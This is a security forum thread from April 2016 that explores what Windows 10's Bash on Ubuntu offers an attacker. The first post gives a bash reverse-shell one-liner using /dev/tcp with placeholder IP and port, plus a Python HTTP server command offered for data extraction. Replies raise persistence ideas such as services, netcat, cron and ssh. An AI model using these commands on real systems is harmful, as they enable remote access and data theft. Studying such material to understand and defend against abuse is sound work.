_VL_ 79 Report post Posted April 13, 2016 I assume everyone is familiar with this: Quote You can now run Bash scripts, Linux command-line tools like sed, awk, grep, and you can even try Linux-first tools like Ruby, Git, Python, etc. directly on Windows. You can also access your Windows filesystem from within Bash allowing you to work on the same set of files using your preferred Windows tools or Linux command-line tools https://blogs.windows.com/buildingapps/2016/03/30/run-bash-on-ubuntu-on-windows/ What advantages does this bring to an attacker if a developer installs this? I installed it Windows 10 on a VM and then went through the process of updating to Insider Preview build 14316. To start BASH you open cmd.exe and type in "bash" in same way you would to start powershell from cmd. You'll notice that you instantly have root. There is no need to "su". I tried writing "C:\Windows" as a test and got a write permission error. I'm assuming it has something to do with how the Windows volume is mounted. I'm still trying to find a way around that. I've only just begun playing with it, but so far I found the following installed by default: Netcat Perl Python I was able to use the following payload to get a reverse listener: bash -i >& /dev/tcp/<ip_address>/<port> 0>&1 Since Python is installed this is another option for data extraction: python -m SimpleHTTPServer <port> Share this post Link to post
GiRa 459 Report post Posted April 13, 2016 I still have to try it but the very first things that comes to mind are: - service for you plus bash or nc to get persistence - check if there is a cron implementation of some kind - check for ssh - messing around with the *nix permissions vs the Windows permissions, I bet there is something funky there Share this post Link to post
bedrisertkaya 11 Report post Posted April 13, 2016 Here is How you can install Bash under Windows http://www.howtogeek.com/249966/how-to-install-and-use-the-linux-bash-shell-on-windows-10/ Share this post Link to post
_VL_ 79 Report post Posted April 14, 2016 On 4/13/2016 at 1:30 AM, GiRa said: I still have to try it but the very first things that comes to mind are: - service for you plus bash or nc to get persistence - check if there is a cron implementation of some kind - check for ssh - messing around with the *nix permissions vs the Windows permissions, I bet there is something funky there SSH is installed as well as OpenSSH server: Quote root@localhost:/mnt/c/Users/test# apt-get install openssh-server Reading package lists... Done Building dependency tree Reading state information... Done openssh-server is already the newest version. 0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded. root@localhost:/mnt/c/Users/test# Cron is also installed much to my surprise Just found this article: http://www.pcworld.com/article/3051604/windows/linuxs-deadliest-command-doesnt-faze-bash-on-windows-10.html Seems that Root != Administrator on Windows. That's important to note. Share this post Link to post
_VL_ 79 Report post Posted April 14, 2016 Yes. I should have guessed this. Once I opened cmd.exe as administrator I then had permissions from within BASH to write to "C:\Windows". Share this post Link to post
_VL_ 79 Report post Posted April 14, 2016 So this is interesting. I created normal user on Windows 10 (not an administrator), switched to the account and had this experience: Typed in "BASH". This made me type "y" again, download BASH from the Windows Store and install it. # remember that this is without Administrative rights. I was then able to install whatever I want from BASH without administrative rights. Seems like this is ripe for abuse. One example, I was able to install NMAP. I did run into this when I tried to run a scan: Quote root@localhost:/mnt/c/Users/test# nmap scanme.nmap.org Starting Nmap 6.40 ( http://nmap.org ) at 2016-04-14 22:44 UTC route_dst_netlink: cannot create AF_NETLINK socket: Invalid argument Seems like they haven't completely integrated all of Linux networking features into BASH for Windows yet. Share this post Link to post
_VL_ 79 Report post Posted April 14, 2016 I would never have thought that Microsoft had a Github account: https://github.com/Microsoft/BashOnWindows/issues/5 1 Share this post Link to post